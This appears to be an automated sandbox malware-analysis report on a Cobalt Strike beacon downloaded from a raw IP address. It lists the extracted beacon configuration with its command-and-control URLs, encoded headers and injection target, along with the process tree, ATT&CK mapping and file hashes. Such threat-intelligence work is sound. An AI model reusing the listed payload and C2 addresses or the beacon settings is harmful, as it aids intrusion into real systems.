Overview

overview

10

Static

static

URLScan

urlscan

http://45.141.84.182...

windows10_x64

10

Analysis

  • max time kernel
    103s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    08-12-2020 12:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://45.141.84.182/cb.exe

  • Sample

    201208-1jtvenfkhs

Score
10/10
cobaltstrikebackdoortrojan

Malware Config

Extracted

Family

cobaltstrike

C2

http://NuQuiedi8ezai5aHucei.cantusethis.fun:443/gifs/

http://Jae3Faita9jeiMeiVeiv.cantusethis.site:443/gifs/

http://ibee3sahkei7Ohcu9uGi.cantusethis.online:443/image/
Attributes
  • access_type

    512

  • beacon_type

    2048

  • create_remote_thread

    0

  • day

    0

  • dns_idle

    6.7373064e+07

  • dns_sleep

    8.1297408e+08

  • host

    NuQuiedi8ezai5aHucei.cantusethis.fun,/gifs/,Jae3Faita9jeiMeiVeiv.cantusethis.site,/gifs/,ibee3sahkei7Ohcu9uGi.cantusethis.online,/image/

  • http_header1

    AAAACgAAAB9BY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41AAAACgAAAFJBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsKi8qO3E9MC44AAAACgAAAB5BY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUAAAAKAAAAEUNvbm5lY3Rpb246IGNsb3NlAAAABwAAAAAAAAAPAAAADQAAAAEAAAALL2tpdHRlbi5naWYAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • http_header2

    AAAACgAAAB5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24AAAAKAAAAEUNvbm5lY3Rpb246IGNsb3NlAAAABwAAAAAAAAAPAAAACAAAAAYAAAAOQXV0aGVudGljYXRpb24AAAAHAAAAAQAAAAMAAAACAAAAc3siaW1hZ2VfdXJsIiA6ICJodHRwczovL3N1bjktMjMudXNlcmFwaS5jb20vRzRKdmRaREVmTGRJUGxOTjEtSmtNR1EydW5mMktFSVY1NE9tNWcvYWJKNzBqR0hmVmsuanBnIiwgIm1ldGFkYXRhIiA6ICIAAAABAAAAAiJ9AAAABAAAAAAAAA==

  • http_method1

    GET

  • http_method2

    POST

  • injection_process

  • jitter

    5120

  • maxdns

    235

  • month

    0

  • pipe_name

  • polling_time

    60000

  • port_number

    443

  • proxy_password

  • proxy_server

  • proxy_username

  • sc_process32

    %windir%\syswow64\dfrgui.exe

  • sc_process64

    %windir%\sysnative\dfrgui.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWJolZfZtN4+W4l2naPtrRPBZ9E6XqVyL8XSC08vwYVEtmn7iwPUgBQsddprki6QXEuQUro5OTw+ESzZzNrgOimS9DSimgnM8DroKyW8tQQgiPNHvIWyix4+fH7Ps7uEwr3o1nqPhEQHXYhmsHU/q73G6OxBHNR+OQDKaVgAg5bwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    3.2384e+09

  • unknown2

    AAAABAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown3

    0

  • unknown4

    0

  • unknown5

    0

  • uri

    /temp/

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36

  • year

    0

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

    trojanbackdoorcobaltstrike
  • Executes dropped EXE 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 52 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://45.141.84.182/cb.exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1304 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:4032
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\cb.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\cb.exe"
      2⤵
      • Executes dropped EXE
      PID:4044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2
T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    9f43a9753eac12a88c486b481b742c4e

    SHA1

    337b612e0b28608732d86c9989cd94d52bce70ed

    SHA256

    f9ca88e6279827d156adcea97072aa0c2db454bec66b4af36ea18d88dee600e2

    SHA512

    7036877fed659318f155ea0af9898f97104ab821ff179c8f8e2032fe4df5e376f601a07f76e6fff41c1b1e2a99e6a8f57aad3d2e26ad253e5dff23e7818db656

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    a471261da72ce31b74d7d6c11f61a528

    SHA1

    0c06a65e4f02665cbf8c645f48ffefc3c52e0933

    SHA256

    c53f9d5c428aac669ac704b6d42fb6081ba1bac610d1ce6df0764ce4f8aff51c

    SHA512

    1ab5029d1c6ebe6a76568887554503c52606517efafdc5f9d92f98a3ef252b4d3027fd274b42052895ed2cc48fc3b4d16640cd47bd3ee5988950f1b9c10bb872

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\cb.exe
    MD5

    dbffcc741c54ae7632fb2807c888bdfe

    SHA1

    135fe840084973d099de68992de40224ed1680b9

    SHA256

    55c7a0ec28ac9319b3d2245882007c7c1f72b3f44970d24c6d5c355f993d1fb9

    SHA512

    eab651efd209dee4fb6137ecadfce58e4ecfd1cdcf767a28c02fefc62a814a08d97d81d942f3609a882b4b81767e322f1fea3c5d7688d2d7785a8f1f56e9ef4c

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\cb.exe.el0uohe.partial
    MD5

    dbffcc741c54ae7632fb2807c888bdfe

    SHA1

    135fe840084973d099de68992de40224ed1680b9

    SHA256

    55c7a0ec28ac9319b3d2245882007c7c1f72b3f44970d24c6d5c355f993d1fb9

    SHA512

    eab651efd209dee4fb6137ecadfce58e4ecfd1cdcf767a28c02fefc62a814a08d97d81d942f3609a882b4b81767e322f1fea3c5d7688d2d7785a8f1f56e9ef4c

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\F46QYU7W.cookie
    MD5

    f6864e2861fe09e02689e91858dc4f2a

    SHA1

    f2a74aae50ec2462b4fc25c2a0de1550e64fecef

    SHA256

    d2a98d3e8e3906bd0348eaf49dd157e77ec9fc8f5cad5bf4be4d29d1b96e85a6

    SHA512

    c5025a12793c72bc77f4786c9db1e9c2a5e271c3c8328bd3f852030807aa81b5275c650ddd56dd49e101774d4146d3d6013e8a3f03c76c6458de3d1bc933f058

    Download Submit
  • memory/4032-2-0x0000000000000000-mapping.dmp
    Download
  • memory/4044-7-0x0000000000000000-mapping.dmp
    Download
  • memory/4044-9-0x0000022F057A0000-0x0000022F059AF000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/4044-10-0x0000022F057A0000-0x0000022F059AF000-memory.dmp
    Filesize

    2.1MB

    Download